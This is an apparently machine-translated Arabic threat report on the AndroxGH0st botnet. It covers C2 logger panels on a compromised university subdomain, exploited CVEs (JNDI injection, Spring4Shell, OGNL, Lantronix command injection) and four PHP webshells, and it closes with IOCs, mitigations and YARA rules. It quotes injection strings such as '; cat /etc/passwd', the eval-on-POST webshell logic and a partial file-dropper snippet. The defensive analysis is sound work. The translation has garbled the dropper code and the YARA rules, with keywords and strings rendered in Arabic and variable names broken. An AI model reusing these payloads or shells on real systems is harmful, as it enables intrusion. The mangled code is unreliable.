إلى الخلف
استخبارات الخصم
جدول المحتوى

ملخص تنفيذي

يكشف التحقيق الأخير الذي أجرته CloudSek أن أندروكسجيست بوت نت تطورت بشكل كبير منذ نشاطها المبكر في عام 2023، مستفيدة من مجموعة واسعة من متجهات الوصول الأولي (IAVs). خوادم تم تكوينها بشكل خاطئ/ضعيفة مرتبطة بـ المؤسسات الأكاديمية والمجالات العامة، مثل جامعة كاليفورنيا، النطاق الفرعي «USarHythms» في سان دييغو، تم العثور عليها تستضيف لوحات تسجيل الأوامر والتحكم (C2). تستغل الروبوتات المنصات الشهيرة (مثل أباتشي شيرو، وإطار سبرينج، ووردبرس) وأجهزة إنترنت الأشياء (لانترونيكس)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد وسرقة البيانات الحساسة والتعدين المشفر. تسلط الأدلة من سجلات C2 الضوء على محاولات الاستغلال باستخدام عدد كبير من تقنيات حقن الأوامر. تعمل أغلفة الويب المزروعة على البنية التحتية المخترقة على تسهيل الوصول المستمر ونشر المزيد من الحمولة.

التحليل

الخلفية

  • في العام الماضي كلاود سيكاكتشفت TRIAD أن الروبوتات AndroxGH0st تستغل أكثر من 20 نقطة ضعف منذ أغسطس 2024 على الأقل. [تقرير كامل]
  • أصدرت CISA ورقة مالية استشاري في يناير 2024، لرفع مستوى الوعي حول التوسع في شبكة AndroxGH0st الروبوتية.
  • بعد تقرير CloudSek، أقرت CISA، بالإضافة إلى مصنعي المعدات الأصلية الآخرين، بالاستغلال النشط لنقاط الضعف وإضافتها إلى قائمة KEV.
  • كشفت النتائج الأخيرة أن الروبوتات تعمل منذ مارس 2023 على الأقل، وقامت بتسليح العديد من عمليات استغلال تطبيقات الويب الجديدة لاستخدامها كجزء من ترسانتها، بالإضافة إلى 4 أغلفة ويب من المحتمل استخدامها كأدوات لما بعد الاستغلال.

في تقريرنا الأول، توقعت CloudSek أن مشغلي AndroxGH0st سيقدمون العديد من الحمولات الجديدة في المزيج بحلول منتصف عام 2025. يهدف هذا التقرير إلى فهم تطور الروبوتات، بما في ذلك ناقلات الوصول الأولي الرئيسية (IAVs) التي تم تسليحها بالإضافة إلى تقاريرنا السابقة.

التحليل

  • أثناء عمليات الفحص الروتينية التي أجريناها بحثًا عن عمليات البحث عن البنية التحتية الضارة، عثرت TRIAD من CloudDesk على خوادم الأوامر والتحكم التي تستخدمها شبكة AndroxGH0st الروبوتية.
البحث عن البنية التحتية الضارة - تم العثور على لوحات Logger و Command Sender التي تم تكوينها بشكل خاطئ
  • ينتمي النطاق الأصلي إلى»جامعة كاليفورنيا، سان دييغو».
  • النطاق الفرعي»أوسا ريثمز«يبدو أنه البوابة التي تخص المنتخب الوطني الأمريكي لكرة السلة للرجال تحت 19 عامًا، تم اختيارها لكأس العالم لكرة السلة FIBA تحت 19 عامًا 2025.
  • كما ورد في وقت سابق، تفضل AndroxGH0st استضافة البنية التحتية للمسجل على مواقع الويب المخترقة. في العام الماضي، استضاف مشغلو الروبوتات المسجل الخاص بهم على موقع الويب الخاص بمنصة تجميع الأحداث الجامايكية. هذه المرة، إنها جامعة في الولايات المتحدة.
  • كما نرى، تقوم الخوادم بتخزين الطلبات من وكلاء الروبوتات بمرور الوقت.

البحث عن البنية التحتية الضارة - تم العثور على لوحات Logger و Command Sender التي تم تكوينها بشكل خاطئ

متجهات الوصول الأولي - AndroxGH0st بوت نت

Affected Product Impact
Apache Shiro JNDI Injection, Remote Code Execution
FasterXML jackson-databind 2.x before 2.9.10.4 CVE-2020-9547: JNDI Injection, Remote Code Execution
FasterXML jackson-databind CVE-2020-9548: JNDI Injection, Remote Code Execution
Unix Command Injection Sensitive Information Disclosure
WordPress Plugin “Popup Maker” CVE-2019-17574: Sensitive Information Disclosure
Lantronix PremierWave CVE-2021-21881: WLANScanSSID Command Injection - Remotely Control IoT Device(s)
Apache Struts OGNL Injection: Sensitive Information Disclosure
Spring Framework Spring4Shell CVE-2022-22965 - Remote Code Execution
fastjson-v1.2.47 Remote Code Execution
FasterXML jackson-databind CVE-2020-10650: JNDI Injection, Remote Code Execution

يمثل هذا ارتفاعًا بنسبة 50٪ تقريبًا في عدد ناقلات الوصول الأولية التي تم تسليحها بواسطة AndroxGH0st منذ تقريرنا السابق.

أباتشي شيرو، حقن JNDI الخاص بقاعدة بيانات XML جاكسون بشكل أسرع

تُعد إدخالات السجل التي تستخدم «org.apache.shiro.jndi.jndi.jndiObjectFactory» وorg.apache.xbean.propertyEditor.jndiConverter وcom.ibatis.sqlmap.engine.transaction.jta.jtaTransactionConfig مع عنوان URL الخاص بـ RMI الذي يشير إلى «استغلال» على C2 محاولات كلاسيكية لاستغلال ثغرة أمنية في واجهة جافا للتسمية والدليل (JNDI). يمكن أن تؤدي هذه التقنية إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) على الخادم المستهدف. لأباتشي شيرو،

  • يرسل Androxgh0st طلبًا يحتوي على كائن مصمم خصيصًا يحدد فئة org.apache.shiro.jndi.jndiObjectFactory. من المعروف أن هذه الفئة عرضة لحقن Java للتسمية وواجهة الدليل (JNDI).
  • يشير حقل ResourceName إلى خادم استدعاء الأسلوب البعيد (RMI) الضار الذي يتحكم فيه المهاجم.
  • إذا كان الخادم المستهدف ضعيفًا، فسوف يتصل بخادم المهاجم وينفذ الحمولة، مما يؤدي إلى حل وسط.

خطوط من مسجل الأوامر:

حقن أوامر يونيك:

يعد الأمر «؛ cat /etc/passwd" البسيط والفعال المخفي داخل معلمة queriesCNT محاولة صارخة لتنفيذ أوامر عشوائية على نظام يشبه Unix وسرقة معلومات حساب المستخدم الحساسة.

  • تقوم البرامج الضارة بإدخال أمر shell إلى معلمة من المحتمل أن يتم تنفيذها بواسطة نظام تشغيل الخادم.
  • في هذه الحالة، يتم إلحاق الأمر cat /etc/passwd بأمر شرعي، مفصولًا بفاصلة منقوطة، لقراءة الملف الذي يحتوي على معلومات حساب المستخدم.

خطوط من مسجل الأوامر:

ثغرة أمنية في البرنامج المساعد لووردبريس (CVE-2019-17574): 

يشير السجل صراحةً إلى CVE هذا، ويستهدف المكون الإضافي «Popup Maker» لـ WordPress في محاولة لاستغلال عيب معروف.

  • يستهدف هذا الهجوم بشكل مباشر ثغرة معروفة في المكون الإضافي «Popup Maker» لـ WordPress.
  • من خلال تعيين popmake_action إلى popup_sysinfo، يحاول المهاجم تشغيل وظيفة في المكون الإضافي تكشف معلومات النظام.

خطوط من مسجل الأوامر:

حقن أوامر لانترونيكس WLANScanSSID: 

تشير الإدخالات التي تستهدف وظيفة WLANScansSSID مع أوامر curl المضمنة في معلمة SSID إلى محاولات استغلال ثغرة أمنية في إدخال الأوامر، على غرار CVE-2021-21881.

  • تستغل البرامج الضارة ثغرة في حقن الأوامر في وظيفة WlanScansSID لأجهزة Lantronix.
  • يقوم بإدخال أمر curl في المعلمة ssid، مما يجبر الجهاز على تقديم طلب HTTP إلى خادم يتحكم فيه المهاجم.
  • هذا يؤكد أن الجهاز ضعيف ويمكن التحكم فيه عن بُعد.

خطوط من مسجل الأوامر:

حقن أباتشي ستروتس OGNL: 

توجد حمولة معقدة من لغة الملاحة الشيئية (OGNL)، وهي سمة مميزة للهجمات ضد إطار Apache Struts2 (على سبيل المثال، CVE-2017-5638) التي يمكن أن تؤدي إلى RCE.

  • هذا هجوم متطور يستخدم حمولة معقدة من لغة الملاحة الشيئية (OGNL).
  • تم تصميم الحمولة لمعالجة بيئة تشغيل Java على الخادم لتجاوز قيود الأمان.
  • الهدف النهائي من هذه الحمولة هو تنفيذ الأمر cat /etc/passwd، على غرار هجوم حقن الأوامر الأبسط.

خطوط من مسجل الأوامر:

إطار الربيع RCE (Spring4Shell): 

يشير التلاعب بـ Class.module.ClassLoader إلى محاولات استغلال ثغرة Spring4Shell الحرجة (CVE-2022-22965)، والتي تسمح بتنفيذ التعليمات البرمجية عن بُعد.

  • يتلاعب المهاجم بخصائص أداة تحميل الفئة في Spring Framework، وهي ثغرة تعرف باسم Spring4Shell.
  • من خلال تعيين ملف Class.module.classloader.resources.context.config إلى موقع بعيد، يمكن للمهاجم خداع الخادم لتحميل ملف تكوين ضار.
  • يمكن أن يؤدي ذلك إلى تنفيذ التعليمات البرمجية عن بُعد (RCE)، مما يمنح المهاجم التحكم الكامل في الخادم.

خطوط من مسجل الأوامر:

تعدين العملات المشفرة

وجود طلبات JSON-RPC مثل {«id»: 1، «الطريقة»: «getwork»، «المعلمات»: []} و {«id»: 1، «الطريقة»: «eth_getWork»، «المعلمات»: []} يشير بقوة إلى أن المهاجمين ينشرون أيضًا برامج تعدين العملات المشفرة على الخوادم التي تمكنوا من اختراقها يتم استخدام هذه الأوامر لجلب مهام التعدين من تجمع التعدين.

بالإضافة إلى ذلك، وجدنا مجموعة من أغلفة الويب المصممة لمختلف الأدوات المساعدة.

1. abuok.php (hex2bin+حمولة التقييم)

  • ماذا تفعل:
    • يكتب ملف PHP الذي:
      • يقمع الأخطاء.
      • ينفذ التعليمات البرمجية الغامضة (عبر eval (hex2bin (...))).
      • ملفوفة بعبارة «abu... ok» غير المرغوب فيها ربما لتجاوز الماسحات الضوئية الأساسية.
  • سلوك الحمولة (تم فك تشفيره):
    • يعرّف الفئة N بالطرق __construct و __destrut و e ().
    • في __destrut ()، يتحقق مما إذا كان $this->c [5] === 'P' وينفذ $this->e ().
    • تستدعي الدالة e () في النهاية eval (...) على كود PHP المنشور ($_POST ['abu']).
    • هذا هو تنفيذ التعليمات البرمجية عن بعد عبر طلب POST.

2. myabu.php (تشويش ROT13، منشور التقييم)

  • ماذا تفعل:
    • str_rot13 («riny») = «التقييم».
    • هذا يعني: التقييم ($_POST ['abu'])؛
  • الغرض: كلاسيكي غلاف ويب PHP قبول التعليمات البرمجية التعسفية عبر POST.

3. scwj.php (غلاف تحميل الملف)

  • الغرض: أ الباب الخلفي لتحميل الملفات.
    • يمكّن المهاجم من تحميل أي ملف (على سبيل المثال، المزيد من البرامج الضارة وأغطية الويب) إلى الخادم.

4. baocun.php (قطارة الكود عبر منطقة النص)

$content = '<form method=\ "post\" ><textarea name=\ "x\" ></textarea> <button>أبوك <?</button></form> php $_POST «،

«ملف_put_contents (\" a.php\»، $_POST [\ "x\"])؛؟ >';\ r\n\ r\nإذا (file_put_contents ($اسم الملف، $content، FILE_APPEND)!» : «= خطأ) {\ r\necho\" XRABUOK\»؛\ r\n} آخر {\ r\necho\ "XRABUSB\»؛\ r\n}\ r\n؟ >\ r\n»

  • الغرض: أ قطارة الكود.
    • يقبل الإدخال عبر POST في منطقة نصية.
    • اكتبها على ملف a.php.
  • لماذا؟ للسماح للمهاجم بزرع برنامج نصي جديد على النظام.

IOC

Indicators Type Comments
cv032vemsb87jtt2p11g5h8xztka6kruj[.]oast[.]me
cv032vemsb87jtt2p11getfd9zd4tpqqs[.]oast[.]me
d0i0taritt4c9dh9hln06thpknw9dcqhu[.]oast[.]today
d0i0taritt4c9dh9hln0h7xsu7h88cxfr[.]oast[.]today
ch14vjilcoecm8580ft0g6xsmrkewgwro[.]oast[.]live
ch14vjilcoecm8580ft0owzy7e9c7hu36[.]oast[.]live
chcmp35oujaubpa7e86g1wz9dypg9oc67[.]oast[.]site
chcmp35oujaubpa7e86g7mnzmqr9qadow[.]oast[.]site
chi2p4r4bcdfd791dh50c6dpgu4h9rdhc[.]oast[.]fun
chi2p4r4bcdfd791dh50e76q1is16rh83[.]oast[.]fun
cj7409i4t88ukb0publgakedcbwnz7nzy[.]oast[.]live
cj7409i4t88ukb0publgtphu9h34f9bpn[.]oast[.]live
Subdomain Lantronix WLANScanSSID Command Injection
cv032vemsb87jtt2p11g9n8d9kmxqhq6q[.]oast[.]me
cv032vemsb87jtt2p11ger6hddhzm5j4p[.]oast[.]me
d0i0taritt4c9dh9hln0rhrdyu5ds8frk[.]oast[.]today
d0i0taritt4c9dh9hln0w8mzbmxi5bu96[.]oast[.]today
ch14vjilcoecm8580ft0bhwxm3yjaacyo[.]oast[.]live
chcmp35oujaubpa7e86gke4ba4r5iwxwz[.]oast[.]site
chcmp35oujaubpa7e86gkmmxw6tzhz5s6[.]oast[.]site
chi2p4r4bcdfd791dh50af56ny6e5p6e3[.]oast[.]fun
chi2p4r4bcdfd791dh50tp6ptaa1syixo[.]oast[.]fun
cj7409i4t88ukb0publgep4f3ii11ogdk[.]oast[.]live
cj7409i4t88ukb0publgjtkyt534mnrby[.]oast[.]live
Subdomain Spring4Shell
cv032vemsb87jtt2p11g5y63nwb1ekujx[.]oast[.]me
cv032vemsb87jtt2p11gwf68p1xw7rgtk[.]oast[.]me
Subdomain Fastjson-v1.2.47 RCE
cv032vemsb87jtt2p11gzhoc81cijqymg[.]oast[.]me
cv032vemsb87jtt2p11gz8mdcbnsokgf6[.]oast[.]me
cv032vemsb87jtt2p11gybdoc66nuxxxh[.]oast[.]me
chke3769l5m6jbj8hq90q5hqbd8rq5gkk[.]oast[.]fun
chke3769l5m6jbj8hq90y47n3ayz4uryc[.]oast[.]fun
chke3769l5m6jbj8hq90kumuzndndpokb[.]oast[.]fun
chke3769l5m6jbj8hq90mrpez639ppnhj[.]oast[.]fun
chke3769l5m6jbj8hq90grzqgusyh11ep[.]oast[.]fun
chke3769l5m6jbj8hq90dzxqghnrfe6x6[.]oast[.]fun
i-sh.detectors-testing[.]com
Subdomain Fastjson-v1.2.47 RCE
cv032vemsb87jtt2p11gzs4xhcki44oof[.]oast[.]me
cv032vemsb87jtt2p11gnn3nghfxgd3bt[.]oast[.]me
chke3769l5m6jbj8hq90up1kyouqdf7hx[.]oast[.]fun
chke3769l5m6jbj8hq90tyrybjrzu9d1x[.]oast[.]fun
chke3769l5m6jbj8hq90cjcau8b594eu[.]oast[.]fun
chke3769l5m6jbj8hq90wc79578iwhft1[.]oast[.]fun
chke3769l5m6jbj8hq90d4dhb4nx4zagt[.]oast[.]fun
chke3769l5m6jbj8hq90fu71kckky5x63[.]oast[.]fun
Subdomain Apache Shiro, FasterXML jackson-databind
185.172.128[.]93 IP Address CVE-2024-4577
MD5 Hash 9e1fb14b747b5bdaf817845007a47752 Webshell (abuok.php)
MD5 Hash d6efe92ca18570f940a720e51af77f72 Webshell (myabu.php)
MD5 Hash f65749ddf93e890b48b3bde77b1302aa Webshell (scwj.php)
MD5 Hash 5a12416857547341493b436299e9b886 Webshell (baocun.php)

التأثير

  • الوصول غير المصرح به إلى البنية التحتية الحيوية والمجالات الأكاديمية.
  • تعرض خروقات البيانات معلومات تحديد الهوية الشخصية أو ملفات التكوين الحساسة.
  • تم إعادة استخدام الأنظمة المخترقة لتعدين التشفير أو استضافة البرامج الضارة.
  • التعرض التنظيمي/القانوني بسبب الفشل في تصحيح CVEs المعروفة.
  • الضرر المحتمل للعلامة التجارية من سوء استخدام النطاقات الموثوقة.

عوامل التخفيف

  • قم بتصحيح جميع الأنظمة المتأثرة بالأقراص المدمجة المدرجة (على سبيل المثال، Shiro، Spring4Shell، Fastjson، Jackson).
  • قم بتقييد وصول RMI وLDAP وJNDI الصادر في جدار الحماية.
  • قم بمراقبة المكونات الإضافية لنظام إدارة المحتوى وتقويتها، وخاصة «Popup Maker» على WordPress.
  • قم بمراجعة أنظمة الملفات بانتظام لملفات PHP غير المتوقعة.
  • استخدم WAF أو الحماية الذاتية لتطبيق وقت التشغيل (RASP) لتطبيقات الويب.

تحقق من علامات التسوية

  • ابحث عن أغلفة ويب PHP ذات حمولات غامضة مثل eval (hex2bin (...)) أو ROT13.
  • تحقق من السجلات بحثًا عن معاملات POST المشبوهة مثل أوامر «abu» أو shell.
  • اكتشف الطلبات ذات القيم المحقونة مثل «؛ cat /etc/passwd» أو تعبيرات OGNL.
  • حدد الإشارات المرجعية إلى .oast.me أو.oast.today أو.oast.fun أو نطاقات مشابهة.
  • راجع سجلات الخادم لنشاط JNDI/RMI الذي يستهدف برامج تحميل الفئات أو قاعدة بيانات Jackson.
  • لاكتشاف التحميلات الضارة أو استخدام القذائف في وقت التشغيل، ضع عمليات مسح YARA على:
    • /var/www/
    • /tmp/
    • /التحميلات/
    • مجلدات إضافات ووردبريس

قاعدة يارا: أندروكسGH0ST_ويبشل_أبوك_HEX2bin

قاعدة أندروكس_H0ST_ويبشل_أبوك_HEX2bin

{

ميتا:

الوصف = «يكتشف غلاف AndroxGH0st باستخدام hex2bin + eval»

المؤلف = «CloudSek»

متغير webshell = "abuok.php»

الخطورة = «عالية»

سلاسل:

$s1 = «الإبلاغ عن الخطأ (0)؛» بدون حالة

$s2 = «القيمة (hex2bin (») في حالة الأحرف الأولى

$s3 = «abu<؟ php» بدون أي قضية

$4 = «XRABUOK» في أي حال

الشرط:

حجم الملف <100 كيلوبايت وكل ($*)

}

قاعدة يارا: أندروكسGH0ST_WEBSHELL_myabu_ROT13_EVAL

قاعدة أندروكس_H0ST_ويبشل_myabu_ROT13_EVAL

{

ميتا:

الوصف = «يكتشف غلاف AndroxGH0st باستخدام تقييم ROT13"

المؤلف = «CloudSek»

عائلة البرامج الضارة = «AndroxGH0st»

متغير webshell = "myabu.php»

الخطورة = «متوسطة»

سلاسل:

$s1 = «str_rot13 (\ «riny\»)» في حالة

$s2 = «صورة جديدة ($_POST [\" abu\ "])؛» بدون حالة

$3 = «XRABUOK» على أي حال

الشرط:

حجم الملف أقل من 50 كيلوبايت وكل ($*)

}

قاعدة يارا: أندروكس_G0ST_تحميل_شيل_SCWJ

القاعدة أندروكس_H0st_تحميل_shell_scwj

{

ميتا:

الوصف = «يكتشف غلاف تحميل ملف AndroxGH0st»

المؤلف = «CloudSek»

متغير webshell = "scwj.php»

الخطورة = «متوسطة»

سلاسل:

$s1 = «<نوع الإدخال =\" ملف\ "» بدون حالة

$s2 = «نقل الملف المحمّل ($_FILES» بدون أي حال

$s3 = «<؟ php» بدون أي قضية

$4 = «XRABUOK» في أي حال

الشرط:

حجم الملف أقل من 50 كيلوبايت وكل ($*)

}

قاعدة يارا: أندروكسGH0ST_Dropper_Baocun

قاعدة أندروكس_G0ST_Dropper_Baocun

{

ميتا:

الوصف = «يكتشف قطارة كود PHP المستخدمة من قبل AndroxGH0st»

المؤلف = «CloudSek»

متغير webshell = "baocun.php»

الخطورة = «متوسطة»

سلاسل:

$s1 = «<textarea name=\" x\ ">» بدون أي حال

$s2 = «ملف_put_contents (\" a.php\»، $_POST [\ "x\"])؛» بدون حالة

$3 = «XRABUOK» على أي حال

الشرط:

حجم الملف أقل من 50 كيلوبايت وكل ($*)

}

المراجع

كوشيك بالم
Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.
نيفيا رافي

مدونات ذات صلة